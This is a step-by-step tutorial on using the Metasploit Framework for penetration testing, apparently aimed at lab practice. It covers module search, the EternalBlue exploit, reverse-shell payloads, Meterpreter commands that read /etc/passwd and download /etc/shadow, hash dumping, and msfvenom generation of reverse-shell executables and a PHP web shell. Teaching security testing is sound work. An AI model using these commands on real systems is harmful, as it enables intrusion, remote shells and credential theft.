Metasploit Framework Basics

What is Metasploit?

The Metasploit Framework is the world's most widely used penetration testing platform, developed by Rapid7. It contains hundreds of pre-built exploits, payloads, encoders, and post-exploitation modules — letting you go from vulnerability to shell quickly and reliably.

Key components:

• Exploits — Code that takes advantage of a vulnerability
• Payloads — Code that runs on the target after exploitation (e.g. a shell)
• Auxiliaries — Scanners, fuzzers, and other support modules
• Post modules — Post-exploitation: credential dumping, pivoting, persistence
• Encoders — Obfuscate payloads to evade AV detection

Step 1 — Starting msfconsole

# Start the PostgreSQL database (Metasploit uses it to store data)
sudo systemctl start postgresql

# Initialise the database on first run
sudo msfdb init

# Launch the console
sudo msfconsole

# Verify database connection
msf6 > db_status
Connected to msf. Connection type: postgresql.

# Check version
msf6 > version

Step 2 — Searching for Modules

# Search by keyword
msf6 > search eternalblue

msf6 > search type:exploit platform:linux apache

# Search by CVE number
msf6 > search cve:2021-44228

# Search by service
msf6 > search name:smb type:exploit

# List all auxiliary scanners for a service
msf6 > search type:auxiliary name:ssh

The search results show a Rank column. Ranks from best to worst: excellent, great, good, normal, average, low, manual. Always prefer excellent or great ranked modules.

Step 3 — Using an Exploit Module

# Use a module (by number from search results or full path)
msf6 > use exploit/multi/handler
msf6 > use 0   # use first result from last search

# Example: MS17-010 EternalBlue (SMB exploit)
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# Show all required and optional options
msf6 exploit(ms17_010_eternalblue) > show options

# Get detailed info about the module
msf6 exploit(ms17_010_eternalblue) > info

Step 4 — Understanding Payloads

A payload is what runs on the target machine after the exploit succeeds. The two main types are:

• Staged (windows/x64/meterpreter/reverse_tcp) — Small stager connects back, then downloads the full payload. Smaller size, needs two connections.
• Stageless (windows/x64/meterpreter_reverse_tcp) — Full payload in one. Larger but self-contained. Better for unstable networks.

# List payloads compatible with current exploit
msf6 exploit(ms17_010_eternalblue) > show payloads

# Common payloads
# Windows reverse Meterpreter (staged)
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Linux reverse shell (staged)
set PAYLOAD linux/x86/meterpreter/reverse_tcp

# Simple bash reverse shell
set PAYLOAD cmd/unix/reverse_bash

Step 5 — Setting Options

# Set target host
set RHOSTS 10.10.10.1
set RHOSTS 192.168.1.0/24   # entire subnet

# Set your attack machine IP (for reverse shells)
set LHOST 10.10.14.5
set LHOST tun0   # use VPN interface name directly

# Set listening port
set LPORT 4444

# Verify all options are set correctly
show options

# Check if target appears vulnerable
check

Step 6 — Running the Exploit

# Run the exploit
run
# or:
exploit

# Run as a background job
exploit -j

# List background jobs
jobs

# List active sessions
sessions -l

# Interact with session 1
sessions -i 1

Step 7 — Meterpreter Basics

Meterpreter is Metasploit's advanced payload that runs entirely in memory, making it hard to detect. It gives you a rich set of commands to interact with the target.

# System information
meterpreter > sysinfo
meterpreter > getuid        # current user
meterpreter > getpid        # process ID

# File system navigation
meterpreter > pwd
meterpreter > ls
meterpreter > cd /tmp
meterpreter > cat /etc/passwd

# Download / upload files
meterpreter > download /etc/shadow /tmp/shadow
meterpreter > upload /tmp/payload.sh /tmp/

# Drop into a system shell
meterpreter > shell

# Background the session
meterpreter > background

# Screenshot (Windows targets)
meterpreter > screenshot

Step 8 — Post-Exploitation Modules

# From msfconsole with active session in background

# Dump password hashes (Windows)
use post/windows/gather/hashdump
set SESSION 1
run

# Enumerate installed applications
use post/windows/gather/enum_applications
set SESSION 1
run

# Linux: gather SSH keys
use post/linux/gather/enum_configs
set SESSION 1
run

# Privilege escalation suggestions
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

Step 9 — MSFvenom Payload Generation

MSFvenom is a standalone tool for generating payloads outside of msfconsole. Use it when you need a file to deliver to a target rather than using Metasploit directly.

# List all payload formats
msfvenom --list formats

# Windows reverse Meterpreter EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 \
  -f exe -o payload.exe

# Linux ELF reverse shell
msfvenom -p linux/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 \
  -f elf -o payload.elf

# PHP web shell
msfvenom -p php/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 \
  -f raw -o shell.php

# Python one-liner
msfvenom -p cmd/unix/reverse_python \
  LHOST=10.10.14.5 LPORT=4444 -f raw

# Start a listener to catch the payload
msf6 > use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.5
set LPORT 4444
run

📋 Metasploit Cheat Sheet